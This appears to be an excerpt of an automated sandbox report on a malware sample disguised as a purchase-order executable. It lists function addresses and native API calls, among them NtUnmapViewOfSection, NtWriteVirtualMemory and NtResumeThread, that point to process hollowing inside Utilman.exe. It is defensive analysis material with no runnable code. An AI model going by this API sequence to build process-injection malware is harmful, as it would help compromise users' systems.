Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2CF0 NtOpenProcess,	10_2_04DB2CF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2C00 NtQueryInformationProcess,	10_2_04DB2C00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2DB0 NtEnumerateKey,	10_2_04DB2DB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2D00 NtSetInformationFile,	10_2_04DB2D00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2EA0 NtAdjustPrivilegesToken,	10_2_04DB2EA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2E30 NtWriteVirtualMemory,	10_2_04DB2E30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2F90 NtProtectVirtualMemory,	10_2_04DB2F90
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2FA0 NtQuerySection,	10_2_04DB2FA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2F60 NtCreateProcessEx,	10_2_04DB2F60
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2AB0 NtWaitForSingleObject,	10_2_04DB2AB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB2B80 NtQueryInformationFile,	10_2_04DB2B80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB3090 NtSetValueKey,	10_2_04DB3090
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB3010 NtOpenDirectoryObject,	10_2_04DB3010
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB3D70 NtOpenThread,	10_2_04DB3D70
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB3D10 NtOpenProcessToken,	10_2_04DB3D10
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B98E90 NtCreateFile,	10_2_02B98E90
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B992F0 NtAllocateVirtualMemory,	10_2_02B992F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B990F0 NtDeleteFile,	10_2_02B990F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B99000 NtReadFile,	10_2_02B99000
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B99190 NtClose,	10_2_02B99190
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7F8D7 NtUnmapViewOfSection,NtClose,	10_2_04C7F8D7
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7F95A NtUnmapViewOfSection,NtClose,	10_2_04C7F95A
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7FB53 NtResumeThread,	10_2_04C7FB53

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_013AE054	0_2_013AE054
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E6420	0_2_071E6420
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E84D8	0_2_071E84D8
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E93A0	0_2_071E93A0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E6412	0_2_071E6412
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E5DDA	0_2_071E5DDA
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E5DE8	0_2_071E5DE8
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071EFB99	0_2_071EFB99
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_073AE0D0	0_2_073AE0D0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_073AE0C0	0_2_073AE0C0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_07441718	0_2_07441718
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_07441FF0	0_2_07441FF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_07444FF0	0_2_07444FF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_07446B98	0_2_07446B98
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_07440040	0_2_07440040
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_07440478	0_2_07440478
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_08010011	0_2_08010011
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071ECF5A	0_2_071ECF5A
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E9320	0_2_071E9320
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E0006	0_2_071E0006
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 0_2_071E0040	0_2_071E0040
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00418353	2_2_00418353
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004030A0	2_2_004030A0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0042EAE3	2_2_0042EAE3
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040FAEF	2_2_0040FAEF
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040FAF3	2_2_0040FAF3
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040231E	2_2_0040231E
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00402320	2_2_00402320
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004024C2	2_2_004024C2
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_004024D0	2_2_004024D0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040DCF3	2_2_0040DCF3
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00416551	2_2_00416551
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00416553	2_2_00416553
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040FD13	2_2_0040FD13
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040DE43	2_2_0040DE43
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0040DE38	2_2_0040DE38
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_00402760	2_2_00402760
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016A8158	2_2_016A8158
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01610100	2_2_01610100
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016BA118	2_2_016BA118
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D81CC	2_2_016D81CC
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016E01AA	2_2_016E01AA
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D41A2	2_2_016D41A2
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016B2000	2_2_016B2000
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DA352	2_2_016DA352
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016E03E6	2_2_016E03E6
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0162E3F0	2_2_0162E3F0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016C0274	2_2_016C0274
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016A02C0	2_2_016A02C0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01620535	2_2_01620535
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016E0591	2_2_016E0591
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D2446	2_2_016D2446
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016C4420	2_2_016C4420
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016CE4F6	2_2_016CE4F6
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01620770	2_2_01620770
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01644750	2_2_01644750
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0161C7C0	2_2_0161C7C0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0163C6E0	2_2_0163C6E0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01636962	2_2_01636962
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016EA9A6	2_2_016EA9A6
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0162A840	2_2_0162A840
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0164E8F0	2_2_0164E8F0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016068B8	2_2_016068B8
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DAB40	2_2_016DAB40
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D6BD7	2_2_016D6BD7
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0161EA80	2_2_0161EA80
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0162AD00	2_2_0162AD00
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016BCD1F	2_2_016BCD1F
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0161ADE0	2_2_0161ADE0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01638DBF	2_2_01638DBF
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01620C00	2_2_01620C00
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01610CF2	2_2_01610CF2
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016C0CB5	2_2_016C0CB5
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01694F40	2_2_01694F40
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01662F28	2_2_01662F28
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01640F30	2_2_01640F30
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016C2F30	2_2_016C2F30
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0162CFE0	2_2_0162CFE0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01612FC8	2_2_01612FC8
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0169EFA0	2_2_0169EFA0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01620E59	2_2_01620E59
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DEE26	2_2_016DEE26
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DEEDB	2_2_016DEEDB
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01632E90	2_2_01632E90
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DCE93	2_2_016DCE93
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016EB16B	2_2_016EB16B
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0165516C	2_2_0165516C
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0160F172	2_2_0160F172
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0162B1B0	2_2_0162B1B0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D70E9	2_2_016D70E9
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DF0E0	2_2_016DF0E0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016CF0CC	2_2_016CF0CC
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0160D34C	2_2_0160D34C
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D132D	2_2_016D132D
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0166739A	2_2_0166739A
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016C12ED	2_2_016C12ED
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0163B2C0	2_2_0163B2C0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016252A0	2_2_016252A0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D7571	2_2_016D7571
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016E95C3	2_2_016E95C3
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016BD5B0	2_2_016BD5B0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01611460	2_2_01611460
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DF43F	2_2_016DF43F
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DF7B0	2_2_016DF7B0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01665630	2_2_01665630
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D16CC	2_2_016D16CC
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01629950	2_2_01629950
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0163B950	2_2_0163B950
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016B5910	2_2_016B5910
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0168D800	2_2_0168D800
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016238E0	2_2_016238E0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DFB76	2_2_016DFB76
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01695BF0	2_2_01695BF0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0165DBF9	2_2_0165DBF9
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0163FB80	2_2_0163FB80
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01693A6C	2_2_01693A6C
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DFA49	2_2_016DFA49
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D7A46	2_2_016D7A46
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016CDAC6	2_2_016CDAC6
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01665AA0	2_2_01665AA0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016C1AA3	2_2_016C1AA3
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D7D73	2_2_016D7D73
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01623D40	2_2_01623D40
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016D1D5A	2_2_016D1D5A
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_0163FDC0	2_2_0163FDC0
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01699C32	2_2_01699C32
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DFCF2	2_2_016DFCF2
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DFF09	2_2_016DFF09
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_016DFFB1	2_2_016DFFB1
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01621F92	2_2_01621F92
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: 2_2_01629EB0	2_2_01629EB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E2E4F6	10_2_04E2E4F6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E32446	10_2_04E32446
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E24420	10_2_04E24420
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E40591	10_2_04E40591
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D80535	10_2_04D80535
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D9C6E0	10_2_04D9C6E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D7C7C0	10_2_04D7C7C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DA4750	10_2_04DA4750
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D80770	10_2_04D80770
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E12000	10_2_04E12000
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E381CC	10_2_04E381CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E341A2	10_2_04E341A2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E401AA	10_2_04E401AA
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E08158	10_2_04E08158
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D70100	10_2_04D70100
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E1A118	10_2_04E1A118
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E002C0	10_2_04E002C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E20274	10_2_04E20274
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E403E6	10_2_04E403E6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D8E3F0	10_2_04D8E3F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3A352	10_2_04E3A352
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D70CF2	10_2_04D70CF2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E20CB5	10_2_04E20CB5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D80C00	10_2_04D80C00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D7ADE0	10_2_04D7ADE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D98DBF	10_2_04D98DBF
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D8AD00	10_2_04D8AD00
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E1CD1F	10_2_04E1CD1F
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3EEDB	10_2_04E3EEDB
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D92E90	10_2_04D92E90
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3CE93	10_2_04E3CE93
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D80E59	10_2_04D80E59
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3EE26	10_2_04E3EE26
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D72FC8	10_2_04D72FC8
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D8CFE0	10_2_04D8CFE0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DFEFA0	10_2_04DFEFA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DF4F40	10_2_04DF4F40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E22F30	10_2_04E22F30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DA0F30	10_2_04DA0F30
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DC2F28	10_2_04DC2F28
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DAE8F0	10_2_04DAE8F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D668B8	10_2_04D668B8
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D8A840	10_2_04D8A840
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E4A9A6	10_2_04E4A9A6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D96962	10_2_04D96962
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D7EA80	10_2_04D7EA80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E36BD7	10_2_04E36BD7
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3AB40	10_2_04E3AB40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D71460	10_2_04D71460
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3F43F	10_2_04E3F43F
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E495C3	10_2_04E495C3
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E1D5B0	10_2_04E1D5B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E37571	10_2_04E37571
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E316CC	10_2_04E316CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DC5630	10_2_04DC5630
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3F7B0	10_2_04E3F7B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3F0E0	10_2_04E3F0E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E370E9	10_2_04E370E9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E2F0CC	10_2_04E2F0CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D8B1B0	10_2_04D8B1B0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E4B16B	10_2_04E4B16B
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D6F172	10_2_04D6F172
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DB516C	10_2_04DB516C
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E212ED	10_2_04E212ED
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D9B2C0	10_2_04D9B2C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D852A0	10_2_04D852A0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DC739A	10_2_04DC739A
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D6D34C	10_2_04D6D34C
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3132D	10_2_04E3132D
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3FCF2	10_2_04E3FCF2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DF9C32	10_2_04DF9C32
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D9FDC0	10_2_04D9FDC0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E37D73	10_2_04E37D73
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D83D40	10_2_04D83D40
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E31D5A	10_2_04E31D5A
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D89EB0	10_2_04D89EB0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D43FD5	10_2_04D43FD5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D43FD2	10_2_04D43FD2
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D81F92	10_2_04D81F92
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3FFB1	10_2_04E3FFB1
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3FF09	10_2_04E3FF09
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D838E0	10_2_04D838E0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DED800	10_2_04DED800
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D89950	10_2_04D89950
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D9B950	10_2_04D9B950
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E15910	10_2_04E15910
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E2DAC6	10_2_04E2DAC6
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E21AA3	10_2_04E21AA3
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DC5AA0	10_2_04DC5AA0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E37A46	10_2_04E37A46
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3FA49	10_2_04E3FA49
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DF3A6C	10_2_04DF3A6C
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DBDBF9	10_2_04DBDBF9
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04DF5BF0	10_2_04DF5BF0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04D9FB80	10_2_04D9FB80
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04E3FB76	10_2_04E3FB76
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B81940	10_2_02B81940
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7C7D0	10_2_02B7C7D0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7C7CC	10_2_02B7C7CC
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7AB20	10_2_02B7AB20
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7AB15	10_2_02B7AB15
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7C9F0	10_2_02B7C9F0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B7A9D0	10_2_02B7A9D0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B83230	10_2_02B83230
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B8322E	10_2_02B8322E
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B85030	10_2_02B85030
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_02B9B7C0	10_2_02B9B7C0
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7E77D	10_2_04C7E77D
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7E2C5	10_2_04C7E2C5
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7E3E3	10_2_04C7E3E3
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7D848	10_2_04C7D848
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7CAE8	10_2_04C7CAE8
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: 10_2_04C7CA40	10_2_04C7CA40

Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: String function: 01655130 appears 58 times
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: String function: 0168EA12 appears 86 times
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: String function: 0160B970 appears 250 times
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: String function: 01667E54 appears 110 times
Source: C:\Users\user\Desktop\PO 768733 - 6750.exe	Code function: String function: 0169F290 appears 105 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 04DEEA12 appears 86 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 04DFF290 appears 105 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 04DB5130 appears 58 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 04DC7E54 appears 109 times
Source: C:\Windows\SysWOW64\Utilman.exe	Code function: String function: 04D6B970 appears 250 times

Source: PO 768733 - 6750.exe, 00000000.00000002.1273230183.0000000007F80000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs PO 768733 - 6750.exe
